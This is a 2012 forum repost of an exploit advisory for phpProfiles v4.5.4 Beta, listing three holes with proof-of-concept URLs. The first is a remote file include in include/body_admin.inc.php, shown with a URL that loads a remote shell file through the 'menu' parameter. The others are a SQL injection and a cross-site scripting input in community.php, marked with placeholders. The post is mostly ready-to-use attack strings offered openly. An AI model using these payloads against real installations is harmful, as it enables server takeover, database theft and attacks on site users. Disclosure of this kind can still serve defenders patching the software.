DarkyAngel Posted July 25, 2012 Report Posted July 25, 2012 phpProfiles v4.5.4 Beta - Multiple Vulnerabilities####################################################### Exploit Title: phpProfiles v4.5.4 Beta - Multiple Vulnerabilities ### Date: 24/7/2012 ### Author: L0n3ly-H34rT ### My Site: http://se3c.tk/### Contact: l0n3ly_h34rt@hotmail.com ### Software Link: http://sourceforge.net/projects/phpprofiles/files/latest/download### Tested on: Linux/Windows ####################################################1- Remote File Include :* In File ( include/body_admin.inc.php ) in line 10 :<?include("$menu");?>* P.O.C :http://127.0.0.1/Full_Release/include/body_admin.inc.php?menu=http://127.0.0.1/shell.txt?* Note :Must be allow_url_include=On---------------------------------------------------------------------2- Remote SQL Injection :http://127.0.0.1/full_release/community.php?comm_id=[SQL]-------------------------------------------------------------------------------------3 - Cross Site Scripting :http://127.0.0.1/full_release/community.php?action=showtopic&comm_id=00001&topic_id=0000000009&topic_title=[XSS]-----------------------------------------------------------------------------------# Greetz to my friendz # 1337day.com [2012-07-2Sursa Quote
